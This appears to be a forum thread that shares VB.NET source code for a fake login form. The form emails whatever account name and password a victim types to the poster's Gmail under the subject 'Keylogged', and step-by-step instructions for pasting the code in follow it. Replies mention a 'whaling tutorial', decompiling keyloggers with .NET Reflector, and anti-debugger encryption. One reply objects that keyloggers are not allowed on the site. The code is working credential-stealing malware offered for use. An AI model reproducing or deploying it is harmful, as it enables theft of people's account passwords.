Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("YourGmail", "your Password")
SmtpServer.Port = 587
SmtpServer.Host = "Smtp.Gmail.com"
SmtpServer.EnableSsl = True
SmtpServer.EnableSsl = True
mail.To.Add("ur gmail again")
mail.From = New MailAddress("Username@gmail.com")
mail.Subject = "Keylogged"
mail.Body = TextBox1.Text & TextBox2.Text
SmtpServer.Send(mail)
If TextBox1.Text = "" Then
MsgBox("Enter Your Account Name.", MsgBoxStyle.Information)
End If
If TextBox2.Text = "" Then
MsgBox("Enter Your Password.", MsgBoxStyle.Information)
End If
End Sub
it is based on 2 labels with Account and Password and two text box and 1 button
NOTEEEEEEEE U NEED TO CLICK ON BUTTON1 OR WHAT EVER U NAMED IT AND DELETE ALL THINGS IN IT AND COPY MY CODE AND PUT IT IN IT
Google 'Whaling tutorial', that's the term used for what this is.
You should find something of use.
Download RED Gate .Net Reflector
I thought keyloggers weren't allowed on this site...
Not possible for some keyloggers as they would have been encrypted with an ANTI ( Anti-Debugger ) Also some keyloggers have their source encrypted in a site or something.